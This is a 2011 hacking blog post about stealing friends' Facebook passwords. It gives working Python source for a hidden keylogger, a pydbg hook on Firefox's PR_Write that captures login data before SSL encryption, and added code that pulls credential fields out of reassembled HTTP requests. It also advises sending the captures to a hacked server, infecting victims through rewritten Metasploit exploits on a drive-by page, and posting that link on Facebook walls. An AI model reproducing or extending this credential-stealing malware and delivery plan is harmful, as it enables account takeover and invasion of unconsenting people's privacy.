Sunday 11 September 2011

Geek Update - Hacking Facebook.

This article is addressed to people who are developers.
Face it, if you don't write your own hacker tools you are not a hacker.
Not in my world. You are a script kiddie that uses other people's tools.
There is nothing wrong with that, you need to start somewhere. Probably in my early
years in the world of hacking, as a script kiddie, I hacked more computers in a day than I do today in a year. This is because as a script kiddie you have a lot of free time, you find a method that works, and then you search the net for vulnerable servers that you can apply that method to. Today I don't even hack that much because I'm more interested in the knowledge than in breaking in somewhere.

The power of being a real hacker is that you can write your own tools that address just the computer you want to hack. Today I am going to discuss what I believe are the easiest ways to hack social networks, because many beginners seem interested in this, at least judging by what I read on computer forums. I guess they feel more powerful if they can hack their friends' and enemies' accounts on a social network than a server they have no connection to.

Hack Facebook method: 1 )
It is harder to attack the whole Facebook site. That is why you attack the victim directly: the victim has less security and is probably easy to fool with social engineering if that is required. So these are methods that attack your victim directly.

As a script kiddie, probably the easiest way is to trick the victim into getting infected with a RAT (Remote Administration Tool). The problem with this is that many users have antivirus programs that will detect a known RAT, and it also requires some social engineering to get it to work. That is why we need to write the tool ourselves.

The best way to think as a successful hacker, in my opinion, is the KISS (Keep It Simple, Stupid) mindset. So first think about what our goal is, what we want to accomplish.
Then we write tools that address exactly that.

In this case our goal is to get the user's password so we can log in to his account.
To accomplish this we write a RAT ourselves, but because we use the KISS mindset and know exactly what our goal is, we only write a RAT that saves his password and sends it to us when he logs in to Facebook; all other functionality is uninteresting. Fewer functions means less for an antivirus program to detect, and it is easy to write a program that does one thing and does it well. An experienced user will notice that this is actually no longer a RAT at all, it's a keylogger, and yes it is!

OK, let's start building this keylogger. I would choose Python as the language, because it is really easy to write hacker tools in Python, it's a scripting language so you don't need to compile, it's easier to work with while you are testing, and it's possible to create an executable file later when needed. You will also need a server that your program sends the passwords to when the user has logged in. It is of course best if that server is a hacked one, so there is no connection to you if someone investigates where the passwords are sent, but since this attack targets no company servers you are probably safer, except that your victims will hate you if they find out.


I will not share all of my code here because I don't want script kiddies to use it.
I just want to share the method with those who want to know, and they can write the tools themselves. I will share some example code that shows how this could be accomplished, just as examples. This is a simple keylogger, as an example:

#----------------------------------------
# Simple Keylogger 1.0 Written by nighter
# Purpose: I needed a simple and easy
# keylogger, this was the solution.
# Revision: 1.0
#----------------------------------------
# load all modules (pyHook and pywin32; Python 2, like pyHook itself)
import pythoncom, pyHook, datetime, win32api, win32console, win32gui, os, sys

# Make the console window invisible. GetConsoleWindow returns 0 when
# there is no console (e.g. run under pythonw.exe), so guard the call.
win = win32console.GetConsoleWindow()
if win:
    win32gui.ShowWindow(win, 0)
#--------------------------------------------
# Config Section
#-------------------------------------------
LOGGFILE = "c:\\keylogg.txt"
#-------------------------------------------
# Function: OnKeyboardEvent
# Arguments: event (pyHook KeyboardEvent)
# Purpose: catch keyboard events and append them to LOGGFILE
#------------------------------------------
def OnKeyboardEvent(event):
    mylog_file = open(LOGGFILE, "a")

    # Problem with return and space so I handle
    # them separately.
    if event.Key == "Return":
        mylog_file.write(chr(10))
    elif event.Key == "Space":
        mylog_file.write(chr(32))
    elif event.Ascii:
        # Convert and write all other chars. Keys without an ASCII value
        # (Shift, Ctrl, arrows, ...) report event.Ascii == 0 and are
        # skipped instead of writing a NUL byte into the log.
        mylog_file.write(chr(event.Ascii))
    mylog_file.close()
    # Return True so the keystroke is passed on to the application
    return True
#------------------------------------------
# Check that only one instance is running
#------------------------------------------
needle = 0
f = os.popen("tasklist", "r")
for l in f:
    # Counts every python.exe, including this one. Run the script under
    # python.exe (not pythonw.exe) or adjust the name here.
    if "python.exe" in l: needle = needle + 1
f.close()

# Quit if another instance is running. PostQuitMessage only takes effect
# once the message loop below is running, so exit directly instead.
if needle > 1:
    sys.exit(0)

# Write timestamp
mylog_file = open(LOGGFILE, "a")
n = datetime.datetime.now()
mylog_file.write(str(n))
mylog_file.write(chr(10))
mylog_file.write("--------------------------")
mylog_file.write(chr(10))
mylog_file.close()

# create a hook manager
hm = pyHook.HookManager()
# watch for all key-down events
hm.KeyDown = OnKeyboardEvent
# set the low-level keyboard hook
hm.HookKeyboard()
# wait forever, pumping messages so the hook callback gets called
pythoncom.PumpMessages()

Very simple, but it's just to give you a clue how to do this. Then you need
to add some socket code that sends the keylog file to your server every so often so you can review it. The problem with this is that it will log a large amount of data that is not interesting, and the volume makes it more detectable when the file is sent to you. If the goal is just to access Facebook, it is better if it logs just the Facebook password and sends only that. To accomplish this it is better to hook functions inside the victim's web browser, so you see the request before it is encrypted for SSL. You can do that like this.
(Example on Firefox, hooking PR_Write in nspr4.dll, the NSPR function Firefox passes every outgoing buffer through before the SSL layer encrypts it. This needs PaiMei's pydbg and utils packages, Python 2 and a 32-bit Firefox; note that attaching a debugger to the browser is easy to spot, and that later Firefox builds fold NSPR into nss3.dll, so the module name may need changing.)

from pydbg import *
from pydbg.defines import *

import utils          # PaiMei's utils package, provides hook_container
import sys

dbg = pydbg()
found_firefox = False

# Let's set a global pattern that we can make the hook
# search for. It has to match what the login form actually
# sends: a form whose password field is named e.g. "pass"
# rather than "password" slips past this filter.
pattern = "password"

# We take in the dbg instance, which also contains all
# of our register contexts, and a list[] of the arguments
# of PR_Write(fd, buf, amount): args[1] is the buffer and
# args[2] the number of bytes to send.
def ssl_sniff( dbg, args ):

    # Read exactly args[2] bytes. PR_Write buffers are not
    # NUL-terminated, so reading until a NUL byte would run past
    # the end of the buffer (and raise on unmapped memory).
    length = args[2]
    if length == 0:
        return DBG_CONTINUE

    buffer = dbg.read_process_memory( args[1], length )

    if pattern in buffer:
        print "Pre-Encrypted: %s" % buffer

    return DBG_CONTINUE


# Quick and dirty process enumeration to find firefox.exe
for (pid, name) in dbg.enumerate_processes():

    if name.lower() == "firefox.exe":

        found_firefox = True
        hooks = utils.hook_container()

        dbg.attach(pid)
        print "[*] Attaching to firefox.exe with PID: %d" % pid

        # Resolve the function address
        hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write")

        if hook_address:
            # Add the hook to the container: three arguments (fd, buf,
            # amount), ssl_sniff as the entry callback, and no exit
            # callback so we set it to None
            hooks.add( dbg, hook_address, 3, ssl_sniff, None)
            print "[*] nspr4.PR_Write hooked at: 0x%08x" % hook_address
            break
        else:
            print "[*] Error: Couldn't resolve hook address."
            sys.exit(-1)


if found_firefox:
    print "[*] Hooks set, continuing process."
    dbg.run()
else:
    print "[*] Error: Couldn't find the firefox.exe process. Please fire up firefox first."
    sys.exit(-1)

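Two loose ends in the text above: the plain keylogger logs everything, and the PR_Write hook hands you one raw buffer per write call and only does a substring match on it. In practice Firefox writes the headers and the body of a request in separate calls, and the login form's field name is whatever the site chose, so "password" in one chunk is not a reliable test. As an added example (not from the original post and not nighter's code), the Python 3 block below reassembles per-descriptor write chunks into complete HTTP requests and pulls the interesting fields out of urlencoded POST bodies; in the hook, args[0] is the fd and the buffer is args[1] for args[2] bytes, which is the (fd, chunk) pair feed() takes. The descriptor numbers, host, field names and credentials in SAMPLE_WRITES are constructed, and the names RequestAssembler, extract_form_fields and harvest are my own.

```python
# Added example: reassemble PR_Write-style chunks into HTTP requests and
# extract credential fields from form POSTs. Not part of the original post.
from urllib.parse import parse_qs

# Field names worth keeping (assumed list; adjust to the target form).
INTERESTING = ("pass", "password", "pwd", "email", "user", "login")


class RequestAssembler:
    """Buffers outgoing chunks per socket descriptor until a full HTTP
    request (header block plus Content-Length bytes of body) is present."""

    def __init__(self):
        self._buffers = {}   # fd -> bytes written so far but not consumed

    def feed(self, fd, chunk):
        """Add one write of `chunk` bytes on descriptor `fd`.
        Returns a list of completed requests as (method, path, headers, body)."""
        data = self._buffers.get(fd, b"") + chunk
        complete = []
        while True:
            end = data.find(b"\r\n\r\n")
            if end < 0:
                break                       # header block not finished yet
            head, rest = data[:end], data[end + 4:]
            request_line, _, header_block = head.partition(b"\r\n")
            parts = request_line.split()
            if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
                data = rest                 # not an HTTP request line: discard
                continue
            headers = {}
            for line in header_block.split(b"\r\n"):
                name, sep, value = line.partition(b":")
                if sep:
                    headers[name.strip().lower().decode("latin-1")] = \
                        value.strip().decode("latin-1")
            try:
                length = int(headers.get("content-length", "0"))
            except ValueError:
                length = 0
            if len(rest) < length:
                break                       # body still arriving in later writes
            complete.append((parts[0].decode("latin-1"),
                             parts[1].decode("latin-1"),
                             headers, rest[:length]))
            data = rest[length:]            # anything left starts the next request
        self._buffers[fd] = data
        return complete


def extract_form_fields(request, wanted=INTERESTING):
    """Return {name: value} for wanted fields of a urlencoded POST body,
    or {} for anything that is not such a request."""
    method, _path, headers, body = request
    if method != "POST":
        return {}
    if not headers.get("content-type", "").startswith(
            "application/x-www-form-urlencoded"):
        return {}
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return {k: v[0] for k, v in fields.items() if k.lower() in wanted}


def harvest(writes, wanted=INTERESTING):
    """Run (fd, chunk) pairs through the assembler; return a list of
    (fd, path, fields) for every request carrying wanted fields."""
    asm = RequestAssembler()
    found = []
    for fd, chunk in writes:
        for req in asm.feed(fd, chunk):
            fields = extract_form_fields(req, wanted)
            if fields:
                found.append((fd, req[1], fields))
    return found


# Constructed sample of what a hook would see: an unrelated GET on fd 7, and
# a login POST on fd 9 whose headers and body arrive in three separate writes.
# Host, field names and values are made up; note the field is "pass", which
# a plain 'if "password" in buffer' test would never match.
SAMPLE_WRITES = [
    (7, b"GET /favicon.ico HTTP/1.1\r\nHost: example.test\r\n\r\n"),
    (9, b"POST /login HTTP/1.1\r\nHost: example.test\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\n"
        b"Content-Length: 38\r\n\r\n"),
    (9, b"email=alice%40example.test&pa"),
    (9, b"ss=s3cret"),
]

if __name__ == "__main__":
    for fd, path, fields in harvest(SAMPLE_WRITES):
        print("fd %d %s -> %s" % (fd, path, fields))
```

Keying the buffers on the descriptor matters because the browser keeps several connections open at once; without it a chunk from one request lands in the middle of another. The Content-Length check is what lets the body be spread over any number of writes, and the request-line check drops non-HTTP writes instead of mis-parsing them.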

OK, so you have now written your tools. The next problem is to get the tool installed on the victim's computer. To do this I like to use exploits to infect the victim with my tools. I love the Metasploit project; it is a tool that is kept up to date with the latest security holes. You don't need to keep track yourself, because they do it for you, with a lot of already written exploit modules. So I often check it and rewrite their modules so they infect a computer with my own tools. The easiest way is to set up a web server with appropriate exploit modules rewritten from Metasploit that infect the victim when they visit your homepage.

So now you can paste your homepage address on the Facebook wall, and slowly watch your friends' passwords start arriving at your server.

This is maybe not ethically correct, because you will probably have no friends left if you hack their private lives, but this is a simple demonstration of how to hack FB. What you do with this information is up to you.